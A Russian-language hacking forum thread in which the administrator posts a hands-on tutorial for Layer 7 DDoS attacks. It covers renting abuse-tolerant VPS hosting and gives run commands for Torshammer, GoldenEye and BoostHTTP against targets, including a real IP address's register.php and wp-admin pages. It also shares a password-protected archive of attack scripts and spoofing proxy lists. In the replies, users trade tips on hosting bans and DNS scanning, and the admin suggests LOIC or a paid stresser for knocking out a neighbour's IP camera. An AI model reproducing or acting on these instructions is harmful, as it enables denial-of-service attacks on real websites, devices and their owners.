Актуально Обучение DDoS атакам

Тема в разделе "DDoS", создана пользователем AnGel, 21 окт 2017.

  1. Здравствуйте пользователи, у нас в команде возникли серьезные разногласия, которые не могут больше оставаться неразрешенными, в связи с этим весь состав отправляется в отпуск отдохнуть и набраться сил. Весь состав остается неизменным, но он полностью отстранен от модерации форума.

    А теперь о нарушениях за которые я собственноручно буду выдавать блокировки до конца месяца или перманент:
    — оскорбления участников форума - до конца месяца/перманент
    — создание тем в разделах, которые не предназначены для этого или не отвечают требованиям - удаление темы, блокировка до конца месяца
    — флуд/спам/реклама - перманент
    — идиотизм - до конца месяца
    — мультиаккаунты - перманент
    — временная почта/рандом ник - перманент (нам не нужен биомусор)
    — остальные правила - блокировка до месяца

    Все что не запрещено — разрешено, но (!), если это не противоречит здравому смыслу. Оценка здравого смысла остается за администрацией ресурса.
    P.S. мне глубоко наплевать, сколько останется активных пользователей, я вижу серьезную проблему в отношении к правилам как пользователей, так и нашего состава модераторов, и мы это будет искоренять.
  1. AnGel

    AnGel Администратор
    Команда форума

    27 авг 2015
    2.975
    2.035
    Telegram:
    И так здравствуйте. Сегодня я раскрою миф о Layer7 ддос атаках, http протокола. Есть атаки с ботнетов а есть с серверов со спуфом.
    Что такое спуф? Это когда 1 сервер отсылает запросы с направлением на удаленный веб-сервер (не факт что веб) через определенное количество прокси серверов, которые отсылают уже забрасывают пакеты на конечную точку (сервер который вы атакуете) полуоткрытыми соединения "tcp-syn атаки".
    На самом деле что бы положить сайт никакой мощности и не требуется, просто знания выявления уязвимостей и правильность использования протоколов и приложения веб-сервера (Apache2, NGINX).
    Для того что бы атаковать без-палевно, возьмите за 350 рублей сервер VPS с хорошей сетью. Советую брать тут, ибо им глубоко наплевать чем вы занимаетесь на сервере. Пожалуйста, войдите или зарегистрируйтесь для просмотра ссылок
    Нет нет - это не пиар хостинга, они всем ддосерам известны как торговцы и реселлеры серверов. Для начала VPS за 5$ вам в полне должно хватить, можете воспользоваться VPS серверами с тестовым периодом, но я советую брать сразу такой.

    Далее укажите в запросе что бы вам поставили ОС Debian или Ubuntu. После получения доступов к серверу - скачиваем PUTTY (программа для удаленного управления Linux серверов)

    Вписываете ИП, логин - root и пароль который вам выслали на почту.

    Перед вами черный терминал: и так приступим!

    Вписываем команды:
    Код:
    apt-get update
    apt-get install python python3
    pip install python-lib
    apt-get install perl
    apt-get upgrade
    
    Далее скачиваем мой архив со скриптами Пожалуйста, войдите или зарегистрируйтесь для просмотра ссылок, в нем 3 скрипта под Layer7 атаки на вебсерверы методами get/post/head/
    Рассмотрим первый ( Torshammer )
    распаковываем все архивы в папке root и в терминале прописываем
    Код:
    chmod -R 777 /root
    И кстати что бы залить архив и распаковать его - надо воспользоваться программой Filezilla или Winscp - так же вписывайте IP+ root + пароль.

    Далее команды:
    Код:
    apt-get install unzip
    unzip ddos_tools.zip
    После того как мы выдали права на root папку, заходим в папку torshammer :
    Код:
    cd /root/torshammer
    Запускаем атаку на сайт который хотите атаковать :
    Код:
    ./torshammer.py www.example.com -r 400
    Этот скрипт вызывает полуоткрытые tcp соединения с 1 и тогоже ип адреса вашего сервера, соединение несет низкий ttl так что эту атаку многие легко смогут заблокировать если додумаются.

    Вторая атака (GET/POST методы)
    Код:
    cd /GoldenEye
    ./goldeneye.py http://www.example.com/ -w 50 -s 5000 -m get -d
    Так же можем атаковать POST методом например по PHP скриптам сайта ( регистрации аккаунтов) или по WordPress
    Код:
    ./goldeneye.py http://91.134.200.189/register.php/ -w 50 -s 600 -m post
    ./goldeneye.py http://91.134.200.189/wp-admin/ -w 50 -s 600 -m post
    Пожалуйста, войдите или зарегистрируйтесь для просмотра ссылок и Пожалуйста, войдите или зарегистрируйтесь для просмотра ссылок - это пример сайтов которые мы атакуем как и по домену так и по IP адресу.

    А теперь самая сильная атака из всех что я знаю для атаки сайтов под спуфы BoostHTTP

    Она используется на 99% стрессорах и вызывает разрушительные ошибки приложения веб-серверов IIS, Apache2 и даже NGINX! Спуф атака про которую я говорил, равносильна атаке с ботнета в зависимости от количества ИП адесов в списке файла proxy.txt

    Код:
    cd /boosthttp
    python BoosTHTTPv3.0.py
    И следуйте примеру - укажите адрес и порт.
    Так же я добавил свежие прокси листы для спуфа. Можете закупаться прокси листами, результатом вы останетесь довольнына все 100%.

    Эти методы на 100% рабочие, все зависит от ваших рук и сайтов,также эти скрипты с открытым кодом и вы можете менять методы атак и структуры отправки пакетов на атакуемый сервер.
    Еще хотел подметить что если запускать атаку по файлам большего размера чем главная страница сайта index, например на сайте есть тяжелое видео или картинка или архив,то атака будет в 2-10 раз производительнее. Ведь 95% хостеров даже не знают как защищать сеть от http флуда.

    Удачи всем кто хочет изучать сеть , для тех кто хочет защищать веб серверы, я создам отдельную тему если вам понравилось.

    Вечная ссылка во вложениях.
    Пароль на архив: dark-time.life

     

    Вложения:

    • ddos_tools.7z
      Размер файла:
      92,2 КБ
      Просмотров:
      130
    10 пользователям это понравилось.
  2. Kanternp

    Kanternp Новорег

    7 ноя 2017
    1
    0
    Мужской
    Отличное начало обучения)
     
  3. leonukv

    leonukv Юзер

    26 фев 2017
    48
    23
    Мужской
    Спасибо за годноту , ты реально ангел.
     
  4. Pitt64

    Pitt64 Юзер

    17 ноя 2015
    22
    8
    Мужской
    Весьма полезно. Черт, как ставить симпатии? Что-то не найду никак:с
     
  5. bubuka55

    bubuka55 Новорег

    23 ноя 2017
    10
    0
    Мужской
    А вот эти скрипты так же использовать?
    Пожалуйста, войдите или зарегистрируйтесь для просмотра ссылок
    P.S
    vds который ты посоветовал там максимум канал 1gbps это мало.. выдел есть 10 gbps вот это уже куда не шло парочку таких снял и всё..
     
  6. bubuka55

    bubuka55 Новорег

    23 ноя 2017
    10
    0
    Мужской
    Фигня,попробывал снять на Пожалуйста, войдите или зарегистрируйтесь для просмотра ссылок vps сервер, не много подосил сервак кс и на почту пришло вот такое письмо.

    "Здравствуйте, мы получили жалобу на ваш сервер. Пожалуйста, решите проблему в течении 24 часов и сообщите нам ответом на это письма о принятых мерах, чтобы избежать блокировки сервера."

    Вот так вот этот хостинг не годится для таких дел.
     
  7. bubuka55

    bubuka55 Новорег

    23 ноя 2017
    10
    0
    Мужской
    Тема больше не актуальна!
     

    Вложения:

    • 12.PNG
      12.PNG
      Размер файла:
      40,9 КБ
      Просмотров:
      125
  8. Likey

    Likey Юзер

    28 авг 2017
    26
    9
    Мужской
    Что неактуального ?
     
  9. Likey

    Likey Юзер

    28 авг 2017
    26
    9
    Мужской
    Ты не в состоянии хост взять
     
  10. bubuka55

    bubuka55 Новорег

    23 ноя 2017
    10
    0
    Мужской
    Что взять? я купил хост только использовал другие скрипты... udp script на perl вот только там ни как прокси не заюзать на vps с этим скриптом...
     
  11. bubuka55

    bubuka55 Новорег

    23 ноя 2017
    10
    0
    Мужской
    И прежде чем писать тут чушь скрины посмотри что vps был куплен и получен бан за ддос,кулцхакер бл*
     
  12. Likey

    Likey Юзер

    28 авг 2017
    26
    9
    Мужской
    То есть одноклеточным абузоустойчивый хост не предлагать ? Для теста тебе жалко потратить 4 бакса ? Ор.
     
  13. bubuka55

    bubuka55 Новорег

    23 ноя 2017
    10
    0
    Мужской
    Омг,ты вообще о чём? я еще раз говорю купил vps на inferno за 5$! и получил бан за исходящий траффик!они сами написали что мой сервер якобы мешает другим соседним серверам что я отжираю у них весь исходящий траффик и дали бан! какая тут абуза?
    Если знаеш где разрешён флуд на vps просвети неуча :) Inferno.PNG
     
  14. Likey

    Likey Юзер

    28 авг 2017
    26
    9
    Мужской
    bubuka55, да не проблема.
    Пожалуйста, войдите или зарегистрируйтесь для просмотра ссылок
    Мне не трудно
     
  15. bubuka55

    bubuka55 Новорег

    23 ноя 2017
    10
    0
    Мужской
    #15 bubuka55, 20 дек 2017
    Последнее редактирование: 20 дек 2017
    гугл я знаю:),но здесь речь в теме шла что админам инферно на всё плевать твори что душе угодно =)

    P.S

    Где достать сорцы для скана DNS серверов не знаеш?
     
  16. Богдан188

    Богдан188 Новорег

    29 окт 2017
    1
    0
    Мужской

    Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.

    Спасибо
     
  17. PAB

    PAB Новорег

    29 май 2018
    3
    1
    Мужской
    Скажите чем можно положить IP камеру...?
     
  18. AnGel

    AnGel Администратор
    Команда форума

    27 авг 2015
    2.975
    2.035
    Telegram:
    PAB, loic если ваш канал превышает канал камеры и нет фильтрации трафика. 100% вариант - стрессер платный.
     
  19. PAB

    PAB Новорег

    29 май 2018
    3
    1
    Мужской
    Неее.... эта камера соседа...)))
     
  20. Max245

    Max245 Новорег

    14 мар 2018
    2
    0
    Мужской
    Толку уже в 2018 от ддос атак